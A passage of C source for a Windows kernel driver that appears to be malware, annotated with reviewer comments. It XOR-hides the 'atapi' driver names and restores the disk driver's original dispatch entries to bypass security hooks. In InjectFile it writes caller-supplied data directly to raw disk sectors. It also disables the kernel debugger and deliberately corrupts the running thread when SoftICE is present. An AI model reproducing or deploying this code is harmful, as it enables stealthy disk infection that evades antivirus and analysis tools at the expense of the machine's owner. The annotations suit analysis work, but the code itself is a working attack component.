// DebugPrint(("Failed to create device!\n"));
return ntStatus;
}
// __try
// {
// ProbeForRead( (PVOID)0x4000, 0x1010, FALSE);
// }
// __except(1)
// {
// ;
// }
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
if(! NT_SUCCESS(ntStatus))
{
IoDeleteDevice(DriverObject->DeviceObject);
// DebugPrint("Failed to create symbolic link!\n");
return ntStatus;
}
{
UNICODE_STRING unstr;
RtlInitUnicodeString(&unstr,FTDISK);
}
// Create dispatch points for all routines that must be handled
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch;
DisableWindbg();
DriverObject->DriverUnload = DriverUnload;
{
GetAtapiDispatchFromFile(&gDispatchRoutine, &gInternRoutine);
FsGetFileRetrievalPointers(NULL, 0);
}
return STATUS_SUCCESS;
}
/*
 * DriverUnload - tear down the control device created at load time.
 *
 * Deletes the symbolic link named by DeviceLinkBuffer and then the driver's
 * device object.  Always returns STATUS_SUCCESS, whether or not a device
 * object existed.
 *
 * NOTE(review): the WDK unload callback type (PDRIVER_UNLOAD) returns VOID;
 * this routine returns NTSTATUS and is stored into DriverObject->DriverUnload
 * elsewhere in the file.  Nothing reads the return value, so it is harmless
 * at runtime, but the signature does not match the documented type.
 * NOTE(review): nothing here restores the disk-driver dispatch entries that
 * xxxPassSNDisk overwrites; those are only put back on IRP_MJ_CLOSE in
 * DriverDispatch, so unloading with a handle still open leaves them patched.
 */
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING linkName;

    /* Nothing to tear down if no device object was ever created. */
    if (DriverObject->DeviceObject == NULL)
        return STATUS_SUCCESS;

    /* Symbolic link first, then the device object it pointed at. */
    RtlInitUnicodeString(&linkName, DeviceLinkBuffer);
    IoDeleteSymbolicLink(&linkName);
    IoDeleteDevice(DriverObject->DeviceObject);

    return STATUS_SUCCESS;
}
/*
 * GetModuleBase - return the load address of a kernel module by file name.
 *
 * ModuleFileName: NUL-terminated base name (e.g. "atapi.sys"); compared
 *                 case-insensitively against the file-name part of each
 *                 entry's ImageName (everything after the last backslash).
 * Returns the module's Base on a match; 0 when not found, when the pool
 * allocation fails, or when the second ZwQuerySystemInformation call fails.
 *
 * NOTE(review): relies on the undocumented SystemModuleInformation class and
 * on the MODULES / SYSTEM_MODULE_INFORMATION layouts from a header not shown
 * here.  The (ULONG) cast of Base truncates on 64-bit builds.
 */
ULONG
GetModuleBase(
PUCHAR ModuleFileName
)
{
NTSTATUS ntStatus = STATUS_SUCCESS;
ULONG Base = 0;
ULONG dwNeededSize = 0;
/* Points at itself so the size probe below gets a non-NULL buffer of length 0. */
PMODULES pModules=(PMODULES)&pModules;
PSYSTEM_MODULE_INFORMATION pSysModInfo;
ULONG i;
PUCHAR ImageName;
PUCHAR p;
/* Size probe.  Its status is never checked; only dwNeededSize is used.  If
 * the call fails without reporting a length, dwNeededSize stays 0 and a
 * zero-byte pool allocation is requested below. */
ntStatus = ZwQuerySystemInformation(SystemModuleInformation,
pModules, 0, &dwNeededSize);
pModules = ExAllocatePool(NonPagedPool, dwNeededSize);
if (pModules == NULL)
{
goto End;
}
/* Dead code: builds a UNICODE_STRING from HARD_VOLUME and discards it.
 * It has no effect on the result (looks like padding). */
{
UNICODE_STRING unstr;
RtlInitUnicodeString(&unstr,HARD_VOLUME);
}
/* Second call fills the buffer.  A module loaded between the two calls
 * can make this fail with a length mismatch, which is treated as "not found". */
ntStatus = ZwQuerySystemInformation(SystemModuleInformation,
pModules, dwNeededSize, &dwNeededSize);
if (!NT_SUCCESS(ntStatus))
{
ExFreePool(pModules);
goto End;
}
pSysModInfo = &pModules->smi;
for (i = 0; i < pModules->dwNumberOfModules; ++i)
{
ImageName = pSysModInfo->ImageName;
/* Strip the directory so only the file name is compared. */
p = strrchr(ImageName, '\\');
if (p != NULL)
p++;
else
p = ImageName;
if (_stricmp(p, ModuleFileName) == 0)
{
Base = (ULONG)pSysModInfo->Base;
break;
}
/* No effect: ImageName is reassigned at the top of the next iteration. */
ImageName += sizeof(SYSTEM_MODULE_INFORMATION);
pSysModInfo++;
}
ExFreePool(pModules);
End:
return Base;
}
/*
 * GetModuleBaseAndSize - like GetModuleBase, but also report the image size.
 *
 * ModuleFileName: NUL-terminated base name, compared case-insensitively
 *                 against the file-name part of each entry's ImageName.
 * dwSize:         optional; on a match receives the entry's Size.  Left
 *                 untouched when the module is not found or on failure.
 * Returns the module's Base on a match, otherwise 0.
 *
 * NOTE(review): duplicates GetModuleBase almost line for line; the only
 * difference is the dwSize out-parameter.  Same caveats apply: undocumented
 * information class, unchecked size probe, possible zero-byte allocation,
 * (ULONG) truncation of Base on 64-bit.
 */
ULONG GetModuleBaseAndSize( PUCHAR ModuleFileName, OUT PDWORD dwSize)
{
NTSTATUS ntStatus = STATUS_SUCCESS;
ULONG Base = 0;
ULONG dwNeededSize = 0;
/* Self-pointer: a non-NULL, zero-length buffer for the size probe. */
PMODULES pModules=(PMODULES)&pModules;
PSYSTEM_MODULE_INFORMATION pSysModInfo;
ULONG i;
PUCHAR ImageName;
PUCHAR p;
/* Size probe; return status is ignored, only dwNeededSize is consumed. */
ntStatus = ZwQuerySystemInformation(SystemModuleInformation,
pModules, 0, &dwNeededSize);
pModules = ExAllocatePool(NonPagedPool, dwNeededSize);
if (pModules == NULL)
{
goto End;
}
/* Fill the buffer; a length mismatch (module list grew) ends up as "not found". */
ntStatus = ZwQuerySystemInformation(SystemModuleInformation,
pModules, dwNeededSize, &dwNeededSize);
if (!NT_SUCCESS(ntStatus))
{
ExFreePool(pModules);
goto End;
}
pSysModInfo = &pModules->smi;
for (i = 0; i < pModules->dwNumberOfModules; ++i)
{
ImageName = pSysModInfo->ImageName;
/* Compare only the file-name component. */
p = strrchr(ImageName, '\\');
if (p != NULL)
p++;
else
p = ImageName;
if (_stricmp(p, ModuleFileName) == 0)
{
Base = (ULONG)pSysModInfo->Base;
if ( dwSize != NULL )
*dwSize = pSysModInfo->Size;
break;
}
/* No effect: overwritten at the top of the next iteration. */
ImageName += sizeof(SYSTEM_MODULE_INFORMATION);
pSysModInfo++;
}
ExFreePool(pModules);
End:
return Base;
}
/*
 * GetAtapiDevice - locate (and cache) the device object of the ATAPI disk driver.
 *
 * Both strings used here are stored XOR-obfuscated and decoded at runtime:
 *   data  ^ 0x15 -> "atapi.sys"      (narrow, into szXXXSys)
 *   data2 ^ 0x35 -> L"\Driver\atapi" (each byte widened into szXXXDrvName)
 * The driver object is then looked up by name with ObReferenceObjectByName,
 * an exported but undocumented routine resolved via MmGetSystemRoutineAddress,
 * and GetDr0Device (not shown in this chunk) picks a device object from it.
 *
 * Side effects: gDiskDrvObj is set to the driver object (the reference taken
 * on it is released before return, so that global is an unowned raw pointer),
 * gAtapiDevObj is set to the device object on success.
 * Returns the device object, or NULL if any step failed.
 *
 * NOTE(review): MmGetSystemRoutineAddress can return NULL; the result is
 * called without a check.  ModuleBase is computed and never used.
 */
PDEVICE_OBJECT GetAtapiDevice()
{
DWORD ModuleBase;
UNICODE_STRING UniAtapi;
UNICODE_STRING uniObXXX;
PDRIVER_OBJECT pDrvObj;
PDEVICE_OBJECT pDevObj = NULL;
NTSTATUS ntStatus;
char szXXXSys[0x10] = {0};
WCHAR szXXXDrvName[0x30] = {0};
DWORD iIndex = 0;
/* "atapi.sys" ^ 0x15; no terminator here, the zeroed array supplies it. */
unsigned char data[9] = {
0x74, 0x61, 0x74, 0x65, 0x7C, 0x3B, 0x66, 0x6C, 0x66 // "atapi.sys" ^ 0x15
};
/* "\Driver\atapi" ^ 0x35 (the original comment said "\Driver\api"; the bytes decode to "atapi"). */
unsigned char data2[13] = {
0x69, 0x71, 0x47, 0x5C, 0x43, 0x50, 0x47, 0x69, 0x54, 0x41, 0x54, 0x45, 0x5C // "\Driver\atapi" ^ 0x35
};
/* Cached from an earlier successful call. */
if ( gAtapiDevObj != NULL )
return gAtapiDevObj;
for ( iIndex = 0; iIndex < 9; iIndex++)
{
szXXXSys[iIndex] = data[iIndex]^0x15;
}
/* Each decoded byte is widened into one WCHAR slot. */
for ( iIndex = 0; iIndex < 13; iIndex++)
{
szXXXDrvName[iIndex] = data2[iIndex]^0x35;
}
KKDbgPrint("szXXXSys: %s..%ws..\r\n", szXXXSys, szXXXDrvName);
/* Result is never used. */
ModuleBase = GetModuleBase(szXXXSys);
RtlInitUnicodeString( &UniAtapi, szXXXDrvName);
RtlInitUnicodeString( &uniObXXX, L"ObReferenceObjectByName");
/* Runtime resolution of an undocumented export; a NULL result is not handled. */
MyObReferenceObjectByName = (XXXObReferenceObjectByName)MmGetSystemRoutineAddress(&uniObXXX);
ntStatus = MyObReferenceObjectByName(&UniAtapi,
OBJ_CASE_INSENSITIVE,
NULL,
0,
IoDriverObjectType,
KernelMode,
NULL,
&pDrvObj);
/* Dead code: builds and discards a UNICODE_STRING for HARD_VOLUME. */
{
UNICODE_STRING unstr;
RtlInitUnicodeString(&unstr,HARD_VOLUME);
}
if ( NT_SUCCESS(ntStatus) )
{
/* Kept as a raw pointer after the reference is dropped below. */
gDiskDrvObj = pDrvObj;
pDevObj = GetDr0Device(pDrvObj);
if ( pDevObj != NULL )
{
KKDbgPrint("ata dr0 dev obj is : %08x...", pDevObj);
gAtapiDevObj = pDevObj;
}
ObDereferenceObject(pDrvObj);
}
return pDevObj;
}
/*
 * CheckUrlSum - validate the 4-byte trailer appended to a payload buffer.
 *
 * The last four bytes of inbuffer are a trailer derived from the body
 * (everything before them):
 *   trailer[0] == (body[0] ^ 0x9a) + 0x57
 *   trailer[1] == (body[2] ^ 0x9a) + 0xdb
 *   trailer[3] == (body[1] ^ 0x9a) + 0x36
 *   trailer[2] == wrapping 8-bit sum of every body byte
 * All arithmetic is done in `char`, so results wrap modulo 256 and follow
 * the compiler's char signedness.
 *
 * Returns TRUE when every trailer byte matches, FALSE otherwise (including
 * len <= 4, where there is no body).  This is a plain integrity check, not
 * an authentication tag: anyone who knows the formula can forge a trailer.
 */
BOOL CheckUrlSum( char* inbuffer, int len)
{
    int bodyLen;
    char *trailer;
    char expected;
    char sum = 0;
    int i;

    if (len <= 4)
        return FALSE;

    bodyLen = len - 4;
    trailer = inbuffer + bodyLen;

    /* Three positional bytes derived from body[0], body[2], body[1]. */
    expected = (char)((inbuffer[0] ^ 0x9a) + 0x57);
    if (expected != trailer[0])
        return FALSE;
    expected = (char)((inbuffer[2] ^ 0x9a) + 0xdb);
    if (expected != trailer[1])
        return FALSE;
    expected = (char)((inbuffer[1] ^ 0x9a) + 0x36);
    if (expected != trailer[3])
        return FALSE;

    /* Wrapping byte sum of the whole body. */
    for (i = 0; i < bodyLen; i++)
        sum += inbuffer[i];

    return (sum == trailer[2]) ? TRUE : FALSE;
}
/*
 * InjectFile - write inputBuffer straight to raw disk sectors at gDiskPos.
 *
 * inputBuffer / inputBufferLength: caller-supplied bytes; they arrive from
 *   the IOCTL path in this driver and are treated here as untrusted.
 * Returns TRUE after the raw write succeeds, FALSE on any precondition or
 * I/O failure.
 *
 * Flow: round the length up to whole 512-byte sectors; unless gXXXOffset is
 * the 0x29A557 "skip" sentinel, verify the CheckUrlSum trailer at
 * inputBuffer + gXXXOffset and patch one byte at the trailer start; read one
 * sector at gDiskPos (the read-back is no longer compared against anything,
 * see the commented-out memcmp); then write dwSector sectors from
 * inputBuffer through SendCommand on the ATAPI device.
 *
 * NOTE(review): dwSector is rounded UP but the write source is the caller's
 * buffer.  If SendCommand transfers dwSector * 512 bytes (its body is not in
 * this chunk), a length that is not a multiple of 512 makes it read up to
 * 511 bytes past the end of inputBuffer and put them on disk.
 * NOTE(review): the first DWORD of inputBuffer is dereferenced for a debug
 * print before the inputBufferLength < 512 check, so a short buffer is read
 * out of bounds before being rejected.
 * NOTE(review): szOrgBuffer is SECTOR_SIZE bytes of kernel stack; its
 * contents are only used as a probe that the device answers reads.
 */
BOOL InjectFile(PVOID inputBuffer, DWORD inputBufferLength)
{
PDEVICE_OBJECT pDevObj;
DWORD dwSector = 0;
char szOrgBuffer[SECTOR_SIZE];
/* Target sector must have been set elsewhere. */
if ( gDiskPos.LowPart == 0 )
return FALSE;
pDevObj = GetAtapiDevice();
if ( pDevObj == NULL )
return FALSE;
/* Round up to whole sectors. */
dwSector = inputBufferLength/512;
if ( inputBufferLength%512 )
dwSector++;
DbgPrint("dwSectors: %d..\r\n", dwSector);
/* Dead code: builds and discards a UNICODE_STRING for PCIHDD_DR0DEVICE_NAME. */
{
UNICODE_STRING unstr;
RtlInitUnicodeString(&unstr,PCIHDD_DR0DEVICE_NAME);
}
/* Dereferences the buffer before the length check below. */
KKDbgPrint("xxxx File is DWORD,%08x...\r\n", *(DWORD*)inputBuffer );
if ( inputBufferLength < 512 )
return FALSE;
/* 0x29A557 means "no trailer check". */
if ( gXXXOffset != 0x29A557 )
{
if ( gXXXOffset != 0 && gXXXOffset < inputBufferLength-4)
{
char* buffer;
char* pszEndMark;
buffer = (char*)inputBuffer;
buffer += gXXXOffset;
if ( !CheckUrlSum(buffer, inputBufferLength-gXXXOffset) )
{
return FALSE;
}
// *(DWORD*)(&buffer[inputBufferLength-4]) = 0x9a;
/* pszEndMark == inputBuffer + inputBufferLength - 4: first trailer byte.
 * Only one byte is written (the commented-out line wrote a DWORD). */
pszEndMark = buffer-gXXXOffset+inputBufferLength-4;
*pszEndMark = 0x9a;
KKDbgPrint("zero xxx is: %08x..%02x\r\n", inputBufferLength-4, *pszEndMark );
}
else
return FALSE;
}
/* Read the current sector; the result is not examined any more. */
if ( !NT_SUCCESS( SendCommand( pDevObj, IRP_MJ_READ, szOrgBuffer, gDiskPos.LowPart, 1) ) )
return FALSE;
// if ( memcmp( szOrgBuffer, gUserinitBuffer, 100) != 0 )
// {
// KKDbgPrint("non same...\r\n");
//
// return FALSE;
// }
/* Raw write of dwSector sectors sourced from the caller's buffer. */
if ( !NT_SUCCESS( SendCommand( pDevObj, IRP_MJ_WRITE, inputBuffer, gDiskPos.LowPart, dwSector) ) )
return FALSE;
KKDbgPrint("xxxx File is here,%08x..%08x..\r\n", pDevObj, gDiskPos.LowPart);
return TRUE;
}
/*
 * xxxPassSNDisk - re-point the disk driver's IOCTL dispatch entries at the
 * addresses recovered by GetAtapiDispatchFromFile (called from DriverEntry).
 *
 * gDispatchRoutine / gInternRoutine start out as image-relative offsets and
 * are rebased exactly once (static bAddedBase) by adding the in-memory base
 * of "atapi.sys" (the name is XOR-decoded from data ^ 0x15).  The currently
 * installed IRP_MJ_DEVICE_CONTROL / IRP_MJ_INTERNAL_DEVICE_CONTROL pointers
 * are saved into gSNDiskDispathc / gSNDiskInternDp so DriverDispatch can
 * restore them on IRP_MJ_CLOSE; then, if the internal-control entry differs
 * from the file-derived one, both entries are overwritten.
 *
 * In effect this removes any third-party hook on the disk driver's dispatch
 * table (the "SN" in the name suggests a specific product; it is not
 * identifiable from this file) so the raw writes in InjectFile reach the
 * device.  inputBuffer / inputBufferLength are not used.
 *
 * Returns FALSE if the offsets were never recovered, the device or driver
 * object is unavailable, or the module base is 0; TRUE otherwise, including
 * when no rewrite was needed.
 *
 * NOTE(review): `(DWORD)lvalue = ...` is an MSVC cast-as-lvalue extension.
 * NOTE(review): the table entries are plain stores with no interlocked
 * exchange or synchronization against in-flight IRPs.
 * NOTE(review): pDrvObj is never assigned, so both debug prints show 0.
 * NOTE(review): only the internal-control entry is compared, but both
 * entries are rewritten.
 */
BOOL xxxPassSNDisk(PVOID inputBuffer, DWORD inputBufferLength)
{
PDRIVER_OBJECT pDrvObj = NULL;
PDEVICE_OBJECT pDevObj = NULL;
DWORD ModuleBase = 0;
CHAR szXXXDrvName[0x30] = {0};
DWORD iIndex = 0;
/* "atapi.sys" ^ 0x15 (same table as in GetAtapiDevice). */
unsigned char data[9] = {
0x74, 0x61, 0x74, 0x65, 0x7C, 0x3B, 0x66, 0x6C, 0x66
};
/* Offsets never recovered from the file: nothing to rebase. */
if ( gDispatchRoutine == 0 )
return FALSE;
for ( iIndex = 0; iIndex < 9; iIndex++)
{
szXXXDrvName[iIndex] = data[iIndex]^0x15;
}
pDevObj = GetAtapiDevice();
if ( pDevObj == NULL )
return FALSE;
ModuleBase = GetModuleBase(szXXXDrvName);
if ( ModuleBase == 0 )
return FALSE;
// if ( !GetNtOSKernelBase() )
// {
// DWORD iIndex;
// for ( iIndex = 0; iIndex < 0x20; iIndex++)
// {
// DWORD* lpBuffer;
// lpBuffer = (DWORD*)PsGetCurrentThread();
// lpBuffer[iIndex] = 0xe8;
// }
// }
KKDbgPrint("dis:%08x...intern: %08x\r\n", gDispatchRoutine, gInternRoutine);
{
/* Rebase once per driver lifetime; later calls reuse the absolute values. */
static BOOL bAddedBase = FALSE;
if ( !bAddedBase )
{
gDispatchRoutine += ModuleBase; // the original (file-derived) address
gInternRoutine += ModuleBase;
bAddedBase = TRUE;
}
}
/* Set by GetAtapiDevice; unowned raw pointer. */
if ( gDiskDrvObj == NULL )
return FALSE;
/* Save whatever is installed now so IRP_MJ_CLOSE can put it back. */
gSNDiskDispathc = (DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL];
gSNDiskInternDp = (DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL];
KKDbgPrint("file drv obj is : %08x...dev control:%08x...intern: %08x", (DWORD)pDrvObj,
gDispatchRoutine,
gInternRoutine);
KKDbgPrint("drv obj is : %08x...dev control:%08x...intern: %08x", (DWORD)pDrvObj,
gSNDiskDispathc,
gSNDiskInternDp);
/* Overwrite both entries when the internal-control one is not the file-derived address. */
if ( gSNDiskInternDp != gInternRoutine )
{
(DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL] = gDispatchRoutine;
(DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL] = gInternRoutine;
}
return TRUE;
}
/*
 * DriverDispatch - single dispatch routine for IRP_MJ_CREATE, CLOSE and
 * DEVICE_CONTROL (also registered for SHUTDOWN in DriverEntry, which falls
 * into the default case here).
 *
 * Every IRP is completed with STATUS_SUCCESS and Information = 0 regardless
 * of what the handlers do; DriverDeviceControl's return value is discarded.
 *
 * Anti-debugging behaviour on every call:
 *  - KdDisableDebugger() turns off the kernel debugger.
 *  - If a module named "ntice.sys" (the SoftICE driver name) is loaded,
 *    0x60 bytes of this function's own code are copied over the current
 *    thread object returned by PsGetCurrentThread(), corrupting it.  This is
 *    a deliberate sabotage path, not a recoverable error.
 *  - DisableWindbg() is called again on the DEVICE_CONTROL path.
 *
 * IRP_MJ_CLOSE restores the disk-driver dispatch entries saved by
 * xxxPassSNDisk, so closing the handle undoes that unhook.
 *
 * NOTE(review): DriverDeviceControl also writes pIrp->IoStatus; whether it
 * completes the IRP itself is not visible in this chunk.  If it does, the
 * IoCompleteRequest below is a double completion.
 */
NTSTATUS
DriverDispatch(
IN PDEVICE_OBJECT pDeviceObj,
IN PIRP pIrp
)
{
PIO_STACK_LOCATION pIrpStack;
char szIce[] = "ntice.sys";
NTSTATUS ntstatus;
/* Unconditional success, set before any handler runs. */
ntstatus = pIrp->IoStatus.Status = STATUS_SUCCESS;
pIrp->IoStatus.Information = 0;
KdDisableDebugger();
pIrpStack = IoGetCurrentIrpStackLocation( pIrp);
/* Overwrite the current KTHREAD with code bytes when SoftICE's driver is present. */
if ( GetModuleBase(szIce) > 0 )
{
RtlCopyMemory( PsGetCurrentThread(), (PVOID)&DriverDispatch, 0x60);
}
// {
// DWORD dwIndex = 0;
// if ( KeGetCurrentIrql() == PASSIVE_LEVEL )
// {
// __try
// {
// ProbeForRead( pIrpStack, 0x1020, FALSE);
// }
// __except(1)
// {
// dwIndex++;
// }
// }
// }
switch (pIrpStack->MajorFunction) {
case IRP_MJ_CREATE :
{
}
break;
case IRP_MJ_CLOSE :
{
/* Put the saved disk-driver dispatch entries back. */
if ( gDiskDrvObj && gSNDiskDispathc && gSNDiskInternDp )
{
(DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL] = gSNDiskDispathc;
(DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL] = gSNDiskInternDp;
KKDbgPrint("recover dispatch routine ok...\r\n");
}
}
break;
case IRP_MJ_DEVICE_CONTROL:
DisableWindbg();
/* Return value ignored; the IRP is completed with STATUS_SUCCESS below. */
DriverDeviceControl( pDeviceObj, pIrp);
break;
default:
break;
}
IoCompleteRequest( pIrp, IO_NO_INCREMENT );
return ntstatus;
}
NTSTATUS
DriverDeviceControl( PDEVICE_OBJECT pDeviceObj, PIRP pIrp)
{
NTSTATUS ntStatus;
PIO_STACK_LOCATION pIrpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG IoControlCode;
//
// Go ahead and set the request up as successful
//
ntStatus = pIrp->IoStatus.Status = STATUS_SUCCESS;
pIrp->IoStatus.Information = 0;